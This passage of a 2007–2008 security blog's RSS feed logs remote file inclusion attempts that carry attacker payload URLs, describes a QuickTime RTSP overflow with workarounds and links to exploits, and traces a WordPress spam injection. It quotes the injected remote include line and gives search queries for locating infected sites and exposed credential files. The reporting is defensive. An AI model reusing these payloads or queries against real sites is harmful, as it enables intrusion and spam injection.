<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Block Apple Quicktime ActiveX &#038; RTSP Exploit</title>
		<link>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/</link>
		<comments>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/#comments</comments>
		<pubDate>Thu, 06 Dec 2007 17:45:50 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Apple]]></category>

		<category><![CDATA[QuickTime]]></category>

		<category><![CDATA[mac]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[ie6]]></category>

		<category><![CDATA[ie7]]></category>

		<category><![CDATA[internet+explorer]]></category>

		<category><![CDATA[jikto]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[safari]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/</guid>
		<description><![CDATA[<p><img width="128" height="128" style="float: left;" alt="Fixes Apple QuickTime" src="http://i.kakkoi.net/leopard/QuickTimePlayer.png" longdesc="http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/" title="Quicktime Logo" /><strong style="font-weight:400">Apple QuickTime</strong> contains a stack <a href="http://en.wikipedia.org/wiki/Buffer_overflow" rev="wikipedia:Buffer_overflow" title="buffer overflow" rel="external nofollow">buffer overflow</a> vulnerability in the way it handles the <abbr title="Real Time Streaming Protocol ">RTSP</abbr> Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol</p><strong>Live Example</strong>
<ul class="xoxo nfo">
<li><a href="http://www.gnucitizen.org/blog/backdooring-quicktime-movies/">GNUcitizen- Backdooring QuickTime Movies </a></li>
<li><a href="http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html">Apple QuickTime redirection to the RTSP exploit</a></li>

</ul>
Elia Florio (Symantec) wrap  a good introduction post regarding <a href="http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html">QuickTime 0 day Exploit</a>. 


<h2 style="border-top:1px solid #ccc; margin-top:38px;padding-top:14px">Known Vulnerabilities Proof of concept (milw0rm).</h2>
<ul class="xoxo nfo">
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY3Mw.curie,80,302">Apple QuickTime 7.3 RTSP Response Content-Type Header Stack Buffer Overflow exploit </a> </li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY2NA.curie,80,302">Apple QuickTime Remote stack rewrite exploit for Internet Explorer 6 &#38; 7</a></li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1Nw.curie,80,302">Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)</a></li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1MQ.curie,80,302">Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit</a></li>
</ul>

<h2 style="margin-top:18px;padding-top:14px">Workarounds</h2>
You may try the following workarounds [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://i.kakkoi.net/leopard/QuickTimePlayer.png" style="float: left" alt="Fixes Apple QuickTime" longdesc="http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/" title="Quicktime Logo" height="128" width="128" /><strong style="font-weight: 400">Apple QuickTime</strong> contains a stack <a href="http://en.wikipedia.org/wiki/Buffer_overflow" rev="wikipedia:Buffer_overflow" title="buffer overflow" rel="external nofollow">buffer overflow</a> vulnerability in the way it handles the <abbr title="Real Time Streaming Protocol ">RTSP</abbr> Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol</p>
<p><strong>Live Example</strong></p>
<ul class="xoxo nfo">
<li><a href="http://www.gnucitizen.org/blog/backdooring-quicktime-movies/">GNUcitizen- Backdooring QuickTime Movies </a></li>
<li><a href="http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html">Apple QuickTime redirection to the RTSP exploit</a></li>
</ul>
<p>Elia Florio (Symantec) wrap a good introduction post regarding <a href="http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html">QuickTime 0 day Exploit</a>.<br />
<span id="more-62"></span></p>
<h2 style="border-top: 1px solid #cccccc; margin-top: 38px; padding-top: 14px">Known Vulnerabilities Proof of concept (milw0rm).</h2>
<ul class="xoxo nfo">
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY3Mw.curie,80,302" rel="nofollow">Apple QuickTime 7.3 RTSP Response Content-Type Header Stack Buffer Overflow exploit </a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY2NA.curie,80,302" rel="nofollow">Apple QuickTime Remote stack rewrite exploit for Internet Explorer 6 &amp; 7</a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1Nw.curie,80,302" rel="nofollow">Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)</a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1MQ.curie,80,302" rel="nofollow">Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit</a></li>
</ul>
<h2 style="margin-top: 18px; padding-top: 14px">Workarounds</h2>
<p>You may try the following workarounds, as there is no complete patch for this this vulnerability.</p>
<ul id="downloads" class="xoxo nfo">
<li> Block TCP <strong>port 554 </strong> (optionaly 7070) and UDP 6970 through 6999 in your firewall</li>
<li>Update <a href="http://www.apple.com/quicktime/download/">Quicktime</a></li>
<li> <a href="http://blog.kakkoi.net/wp-content/uploads/2007/12/disabledquicktimeactivex-kb240797.reg" title="DisabledQuicktimeActiveX-KB240797">Disabled Apple Quicktime ActiveX control running in Internet Explorer</a> (Windows registry file)</li>
<li>For Firefox - <a href="http://noscript.net/">Noscripts</a> addons</li>
</ul>
<h2 style="border-top: 1px solid #cccccc; margin-top: 38px; padding-top: 14px">Related Links</h2>
<ul class="xoxo">
<li><a href="http://info.internet.isi.edu/in-notes/rfc/files/rfc2326.txt">RTSP - rfc2326 </a> &amp; <a href="http://info.internet.isi.edu/in-notes/rfc/files/rfc1889.txt">RTP - rfc1889 </a></li>
<li><a href="http://docs.info.apple.com/article.html?artnum=307038">Apple Security Update on Safari 3 Beta Update 3.0.4</a></li>
<li><a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252">NVD Database - Buffer overflow in Apple QuickTime</a></li>
<li><a href="http://support.microsoft.com/kb/240797">Microsoft KB240797 - How to stop an ActiveX control from running in Internet Explorer</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</title>
		<link>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/#comments</comments>
		<pubDate>Sat, 01 Dec 2007 09:55:53 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[class-mail]]></category>

		<category><![CDATA[cloacking]]></category>

		<category><![CDATA[DoS+Vulnerability]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[mick+jagger]]></category>

		<category><![CDATA[milw0rm]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[RealTime+Streaming+Protocol]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[<img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" style="float:left;margin: 0pt 5px 1px 0pt;" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong><p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><span class="given-name">Matt</span> <span class="family-name">Heaton</span></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when  I  found bunch of spamsware link on <a rev="mattheaton:blog" href="http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p> Matt's is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page</p>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="notice mgb"><small>Dec 11 2007</small> - Matt Heaton Blog&#8217;s has been cleansed. ATM he&#8217;s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade. </p>
<p class="notice mgt mgb"><small>Jan 26th, 2008</small> - Seem like bluehost engineer did a bad job at cleaning, <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">the goro spam is back</a>. </p>
<p><img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" class="thumb- fl" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong>
<p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><strong class="given-name" style="font-weight:400">Matt</strong> <strong class="family-name" style="font-weight:400">Heaton</strong></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when I found bunch of spamsware link on <a rev="mattheaton:blog" href="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p stle="text-align:right" class="cb"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY5MTczNA.curie,80,302" rel="nofollow" rev="sharepic:mattheatonfooter"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004691734.png" class="fr" alt="mattheaton.com bluehost ceo hack wordpress footer" width="130" height="68" /></a></p>
<p> Matt&#8217;s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page.</p>
<h3 id="lookup-results" style="margin-top:36px">Lookup for howardowens.com</h3>
<p>The below diagram explained the lookup results for <a href="http://www.howardowens.com">howardowens.com</a>. <small>click on the image to enlarge.</small></p>
<p><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.png' title='lookup results for howardowens-com'><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.thumbnail.png' alt='lookup results for howardowens-com' /></a><br />
Surprisingly the <span style="text-decoration:line-through">spammer</span> website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).
</p>
<p><span id="more-44"></span></p>
<h2 id="tracking-summary" style="margin-top:18px; border-top: 1px solid #ccc; padding-top:18px" class="sumarry">
Tracking the spam sources.<br />
</h2>
<div class="description">
<p><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow" title="MattHeaton.com Blog Hacked Screenshot"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669853.png" alt="mattheaton.com hacked" width="15" height="130" class="fl" /></a>Viewing <span class="vcard"><a href="view-source:http://mattheaton.com" class="url fn org">mattheaton.com</a></span> html sources I found some hint and start searching for <tt style="background-color:#fff7c7;color:#333;padding:3px">xanax intext:id=\&#8221;goro\&#8221;</tt>. Google return <a href="http://www.google.com/search?q=xanax+intext%3Aid%3D%5C%22goro%5C%22" rel="external nofollow robots-nofollow" rev="google:result">2 results</a> for this query. </p>
<dl id="meta-search-results" class="google-query cb" style="line-height:1.6em">
<dt style="float:left;margin-right:3px;width:150px"><small>1.</small>&nbsp;Wordpress Support</dt>
<dd><a href="http://blog.kakkoi.net/uri/d29yZHByZXNzLm9yZy9zdXBwb3J0L3RvcGljLzEzOTQ1NQ.curie,80,302" rel="external" rev="wordpress:forum" title="php get footer adding spam code">php get footer adding spam code?</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:150px"><small>2.</small>&nbsp;elijahzarwan.net</dt>
<dd><a href="http://blog.kakkoi.net/uri/ZWxpamFoemFyd2FuLm5ldC9ibG9nLz9wPTQzMw.curie,80,302" rel="external nofollow robots-nofollow" class="curie" rev="elijahzarwan:entries" title="div id=&quot;goro&quot;"><strong style="font-weight:400">div id=”Goro”</strong></a> <small>(nice headline)</small>
</dl>
<p> Both site suggest same type of php injection methods<br />
<code lang="php"> include('http://wordpress.net.in/statcounter.php');</code>
</p>
<p>The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from <strong>http://wordpress.net.in/</strong>[random]/ random = 1 - 9.</p>
</div>
<h2 id="raw-whois" style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Raw whois for wordpress.net.in</h2>
<pre class="prebox">
Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
</pre>
<p class="note" style="margin:10px;padding:10px;border:1px solid #eee">Note: The registrant address on <abbr title="1 red square, Moscow">1 red square</abbr> is a famous restaurant in Moscow.</p>
<p> Its pretty obvious that <tt>wordpress.net.in</tt> belong to registrar in India.</p>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Live example wordpress.net.in injection </h2>
<p> Google query for <tt style="background-color:#fff7c7;color:#444;padding:3px">warning &#8220;[function.include]&#8221; allintext: &#8220;wordpress.net.in&#8221; </tt> . Used <a href="http://blog.kakkoi.net/uri/d3d3LmZpZGRsZXJ0b29sLmNvbS9maWRkbGVyLw.curie,80,302" rel="nofollow external robots-nofollow" rev="fiddler:httpdump">fiddler</a> or any http-inspector to trace the full header request.
</p>
<dl id="meta-search-results-wordpress-net-in-inject" class="google-query" style="line-height:1.6em">
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>1</small>&nbsp;Evan Morris</dt>
<dd>Wordpress 2.0.6 | <a href="http://blog.kakkoi.net/uri/d3d3LndvcmQtZGV0ZWN0aXZlLmNvbS93b3JkcHJlc3MvP3A9MTIy.curie,80,302" rel="nofollow external robots-nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/wordpressnetin-goro-injection.png' title='wordpress.net.in goro injection'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>2</small>&nbsp;carwax</dt>
<dd>Wordpress 1.5.2 | <a href="http://blog.kakkoi.net/uri/YmxvZy5jYXJ3YXhwcm9kdWN0aW9ucy5jb20vP209MjAwNjAz.curie,80,302" rel="external nofollow" title="blog.carwaxproductions.com">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>3</small>&nbsp;aabenthus.biz</dt>
<dd>Wordpress 2.0.x | <a href="http://blog.kakkoi.net/uri/YWFiZW50aHVzLmJpeg.curie,80,302" rel="external nofollow robots-nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>4</small>&nbsp;mythinger.com</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:w5Sd6heMJL0J:johnboone.mythinger.com/+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=21&#038;gl=us&#038;client=firefox-a">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/johnboonemythingercom-wordpressnetin.png' title='johnboone.mythinger.com wordpress.net.in'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>5</small>&nbsp;classicalanglican.net</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:fZb5-RNSGv0J:titusonenine.classicalanglican.net/%3Fp%3D13132+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=22&#038;gl=us&#038;client=firefox-a" rel="external nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/titusonenineclassicalanglicannet-wordpressnetin.png' title='titusonenine.classicalanglican.net wordpress.net.in'>screenshot</a>
</dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>6</small>&nbsp;echo9er.net</dt>
<dd>WordPress 1.5.1 | <a href="http://blog.kakkoi.net/uri/d3d3LmVjaG85ZXIubmV0L2Jsb2cvP3A9MjQwMA.curie,80,302" rel="external nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>7</small>&nbsp;boyarick.com</dt>
<dd> Wordpress 2.0.2 | <a href="http://blog.kakkoi.net/uri/Ym95YXJpY2suY29tL2Jsb2cvP3A9MTM2.curie,80,302" rel="nofollow external robots-nofollow">url</a> | screenshot</dd>
</dl>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Google Directory search for class-mail.php</h2>
<p>Search for <strong>class-mail.php</strong> in open directory (public).<br />
<tt style="background:#fff7c7;color:#444;padding:3px">&#8220;parent directory&#8221; class-mail.php -html -htm –php -shtml -md5 -md5sums</tt></p>
<ul class="xoxo">
<li> <strong>jean-cyril.com</strong> - <a href="http://blog.kakkoi.net/uri/d3d3LmplYW4tY3lyaWwuY29tL3dwLWluY2x1ZGVzLw.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams link redirect to <tt>www.901am.com/?page=2157</tt>. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.</li>
<li> <strong>floaridablog.org</strong> - <a href="http://blog.kakkoi.net/uri/ZmxvcmlkYWJsb2cub3JnL3dvcmRwcmVzcy93cC1pbmNsdWRlcy8.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams redirect to <tt>communications.uml.edu/sunrise/?id=1076</tt> (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.</li>
</ul>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Hiding from search engine Spiders</h2>
<p>First, I did some more comparative search at <a href="http://archive.org" rel="external" rev="webservices:alexa">archive.org</a> for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.</p>
<ul>
<li>http://web.archive.org/web/*/http://www.howardowens.com</li>
<li>http://web.archive.org/web/*/http://www.mattheaton.com</li>
</ul>
<p>Out of boredom I cloaked myself as the following agents.</p>
<ul>
<li>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net</li>
<li>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com</li>
<li>Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com</li>
<li>Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
</ul>
<p>Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler &#038; spider from spying their joy-ride-spamhouse.
</p>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Summary</h2>
<p>bits &#038; bytes from this accident we knew that</p>
<ul>
<li>Most of the site inject are running on wordpress 2.0.6 &#038; below</li>
<li><strong>allow_furl_open</strong> is set to true for this injection to work</li>
<li>Most of the blogs owner is unaware about the spams links (cloacking)</li>
</ul>
<p>Checkout Murray <a href="http://gmodules.com/ig/proxy?url=http://www.murrayc.com/blog/wp-content/uploads/2007/11/access_log.txt" rel="nofollow external" class="exturl icn-r" type="text/plain">access log</a>, it will give you some ideas with the remote injections methods.</p>
<h2>Update </h2>
<dl>
<dt>Dec 03 2007</dt>
<dd>All the spams link to <tt>howardowens.com</tt> page has been removed. I havent talk with howardowens but I assume howard&#8217;s site is being injected the same way like Matt Heaton blog.</dd>
<dt>Dec 04 2007</dt>
<dd>Mattheaton.com has a minor update, the spams now inject on both header and footer.<br />
<tt>tangonoticias.com:7070/d_pill/577.html</tt>.<br />
As tangonoticias.com is running on Joomla CMS they create a static &#8220;Wordpress&#8221; on port 7070 (Real Network Server &#038; RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. <a href="http://64.233.167.104/search?q=cache:xjPu95m8yEAJ:mattheaton.com&#038;hl=en&#038;ct=clnk&#038;cd=1&#038;gl=us">Google Cache</a> <small>(Nov 12)</small> </dd>
<dt>Dec 11 2007</dt>
<dd>Matt heaton has been purified. He&#8217;s now using latest version of Wordpress (2.3.1). You can still view it on cached thought &#038; <a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow external" rev="sharepic:gallery">screenshot</a>. </dd>
</dl>
<h2>Related Post</h2>
<ul class="xoxo">
<li><a href="wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><small>Jan 31st, 2008</small> - <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h2 id="related-entries" class="mgb-">External Links</h2>
<ul class="xoxo pdt exturl">
<li><a href="http://www.mattheaton.com">Bluehost Hostmonster CEO&#8217;s blog</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LnJvYnRleC5jb20vZG5zL3dvcmRwcmVzcy5uZXQuaW4uaHRtbA.curie,80,302" rev="robtex:lookup" rel="nofollow external robots-nofollow" title="Lookup via robtext">DNS Lookup results for wordpress.net.in</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LmFib3V0dXMub3JnL01hdHRIZWF0b24uY29t.curie,80,302" rel="external nofollow robots-nofollow" rev="aboutus:mattheaton" title="View mattheaon.com wiki on Aboutus.org">Aboutus.org wiki on MattHeaton.com</a></li>
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
